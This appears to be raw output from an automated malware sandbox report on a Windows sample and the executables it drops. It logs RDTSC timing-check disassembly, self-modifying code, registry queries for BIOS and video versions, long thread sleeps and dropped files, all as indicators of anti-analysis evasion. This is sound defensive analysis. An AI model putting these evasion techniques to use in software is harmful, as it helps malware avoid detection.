Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A073E second address: 56A07B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2F2E8Fh 0x00000009 sbb si, 9D8Eh 0x0000000e jmp 00007F08ED2F2E99h 0x00000013 popfd 0x00000014 mov ecx, 666D2097h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e mov ah, 8Bh 0x00000020 jmp 00007F08ED2F2E95h 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F08ED2F2E91h 0x0000002c xchg eax, ebx 0x0000002d jmp 00007F08ED2F2E8Eh 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A07B9 second address: 56A07D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385F3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A07D1 second address: 56A082C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F08ED2F2E8Ah 0x00000011 xor al, 00000058h 0x00000014 jmp 00007F08ED2F2E8Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d jmp 00007F08ED2F2E94h 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EDEFA6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EDEEA9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EDC45A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 109AA01 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1116F09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4DEFA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4DEEA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4DC45A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 69AA01 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 716F09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Special instruction interceptor: First address: 15DBACF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Special instruction interceptor: First address: 1784373 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Special instruction interceptor: First address: 1782B1F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Special instruction interceptor: First address: 180CCE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Special instruction interceptor: First address: 7FF60AA36954 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Special instruction interceptor: First address: 7FF60AA36964 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Special instruction interceptor: First address: B27A18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Special instruction interceptor: First address: B2799B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Special instruction interceptor: First address: CC55D5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Special instruction interceptor: First address: CED5DB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Special instruction interceptor: First address: CD44BF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Special instruction interceptor: First address: D52969 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Memory allocated: 1AC38E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Memory allocated: 1AC51140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Memory allocated: 13F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_056F0D84 rdtsc

1_2_056F0D84

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599873
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599519
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599391
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599266
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599141
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598780
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598230
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596996
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596763
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596468
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596358
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 596088
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 595872
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 876	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 863	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 864	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2736	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 886	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 876	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 901	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Window / User API: threadDelayed 5845	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Window / User API: threadDelayed 5926
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2978
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window / User API: threadDelayed 1150
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window / User API: threadDelayed 1025
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window / User API: threadDelayed 1110
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window / User API: threadDelayed 1048
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window / User API: threadDelayed 968
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window / User API: threadDelayed 1075
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1359
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3410

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\245347\Dry.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018906001\003.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\UKzjyWlrjRLOjKNNlNHI.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4000	Thread sleep count: 876 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4000	Thread sleep time: -1752876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5332	Thread sleep count: 863 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5332	Thread sleep time: -1726863s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1512	Thread sleep count: 194 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1512	Thread sleep time: -5820000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5820	Thread sleep count: 864 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5820	Thread sleep time: -1728864s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2532	Thread sleep count: 2736 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2532	Thread sleep time: -5474736s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616	Thread sleep count: 886 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616	Thread sleep time: -1772886s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5024	Thread sleep count: 876 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5024	Thread sleep time: -1752876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5040	Thread sleep count: 901 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5040	Thread sleep time: -1802901s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 5608	Thread sleep time: -56028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 4988	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 6260	Thread sleep time: -60030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 5748	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe TID: 6520	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe TID: 8096	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe TID: 8096	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599764s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599519s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -598889s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -598780s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -598230s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -597391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -597219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -597108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596996s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596763s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596468s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596358s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -596088s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -595984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948	Thread sleep time: -595872s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 3328	Thread sleep time: -2301150s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 1584	Thread sleep time: -2051025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 712	Thread sleep time: -2221110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 6208	Thread sleep time: -52000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 3488	Thread sleep time: -2097048s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 4552	Thread sleep time: -1936968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 1780	Thread sleep time: -2151075s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580	Thread sleep count: 1359 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356	Thread sleep count: 3410 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe TID: 2832	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599873
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599519
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599391
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599266
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599141
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598780
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Thread delayed: delay time: 598422
